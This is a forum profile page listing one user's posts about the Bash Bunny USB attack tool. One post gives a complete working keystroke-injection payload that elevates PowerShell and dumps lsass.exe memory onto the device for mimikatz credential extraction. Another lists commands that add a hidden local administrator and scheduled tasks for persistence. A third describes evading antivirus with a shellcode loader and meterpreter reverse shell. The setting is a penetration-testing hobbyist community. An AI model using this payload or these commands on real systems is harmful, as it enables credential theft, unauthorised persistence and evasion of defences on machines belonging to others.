Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

  • Days Won


About rottingsun

  • Rank
    Hak5 Fan ++

Recent Profile Visitors

1,872 profile views
  1. So I ended up having a major issue with a VMware host at work and missed the live. Anyone care to share their impressions of the PS?
  2. Just a few more hours until the new eagles land.
  3. Any further details on the device and what it is capable of, or do we have to wait until tomorrow?
  4. Oughta been interesting. I'll be watching the live stream intently. This blog refers to it as a "programmable MITM device". https://www.doyler.net/security-not-included/def-con-25-bsideslv-2017 I also saw someone on Twitter describe it as "an online tap with payload capability, like the bash bunny".
  5. Is it assumed that the user you are attacking has local admin privs to begin with? If so, you have 2 options: - Create a new local admin with net user myuser userpass /add and then net localgroup Administrators myuser /add. - Use schtasks to create a scheduled task as the new local admin you just created. or -Just create a new scheduled task as system, which doesn't require a password if the user you're running the bunny against has local admin privs. You'll have to play with the schtasks command options to get the every x minutes timing down, but the general syntax for options 1 & 2 should look something like this: schtasks /Create /TR "C:\windows\System32\cmd.exe" /TN "cmdex" /RU myuser /RP userpass /ST 19:08 /SC Once /RL HIGHEST schtasks /Create /TR "C:\windows\System32\cmd.exe" /TN "cmdex" /RU system /ST 19:08 /SC Once /RL HIGHEST
  6. Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. LED Y 100 source bunny_helpers.sh LED B 100 ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING powershell Start-Process powershell -Verb runAs Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500 Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q DELAY 500 Q ENTER Q DELAY 500 Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp Q ENTER Q DELAY 200 Q STRING \$driveEject\=New-Object -comObject Shell.Application Q ENTER Q DELAY 200 Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 200 Q STRING exit Q ENTER LED FINISH
  7. Perhaps LLMNR, NETBIOS, and WPAD are all disabled on the target? Far fetched of it's a home PC i know but.
  8. Nice. I got mine in recently. My first payload was running procdump from the bunny and then saving the dump file onto the bunny for later mimikatz analysis.
  9. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
  10. The latest Empire stagers actually have a bunny target.
  11. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  12. I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  13. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  14. I would but I don't wanna be hungover for work tomorrow.
  15. Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - #OS: Windows (Requires Powershell and Admin Rights) This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably alot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
  • Create New...